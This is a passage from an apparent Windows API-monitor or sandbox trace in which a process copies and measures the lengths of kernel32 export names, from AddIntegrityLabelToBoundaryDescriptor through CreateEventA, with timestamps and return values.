lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.676] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.676] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.676] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.676] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.676] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.676] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.676] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.676] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.676] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.677] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.677] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.677] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.677] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.677] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.677] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.677] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.677] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.677] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.677] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.677] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.677] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.677] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.677] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.677] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.677] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.677] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.677] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.678] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.678] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.678] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.678] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.678] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.678] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.678] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.678] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.678] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.678] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.678] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.678] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.678] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.678] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.678] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.678] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.678] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.678] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.678] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.679] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.679] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.679] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.679] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.679] lstrlenA (lpString="BEEP") returned 4 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.679] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.679] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.679] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.679] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.679] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.679] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.679] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.679] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.679] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.679] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.679] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.679] lstrlenA (lpString="CANCELIO") returned 8 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.679] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.679] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.679] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.680] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.680] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.680] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.680] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.680] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.680] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.680] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.680] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.680] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.680] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.680] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.680] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.680] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.680] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.680] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.680] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.680] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.680] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.681] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.681] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.681] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.681] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.681] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.681] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.681] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.681] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.681] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.681] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.681] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.681] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.681] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.681] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.681] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.681] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.681] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.682] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.682] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.682] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.682] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.682] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.682] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.682] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.682] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.682] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.682] lstrlenA (lpString="COPYFILEA") returned 9 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.682] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.682] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.682] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.682] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.682] lstrlenA (lpString="COPYFILEW") returned 9 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.682] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.682] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.682] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.683] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.683] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.683] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.683] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.683] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.683] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.683] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.683] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.683] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.683] lstrlenA (lpString="CREATEEVENTA") 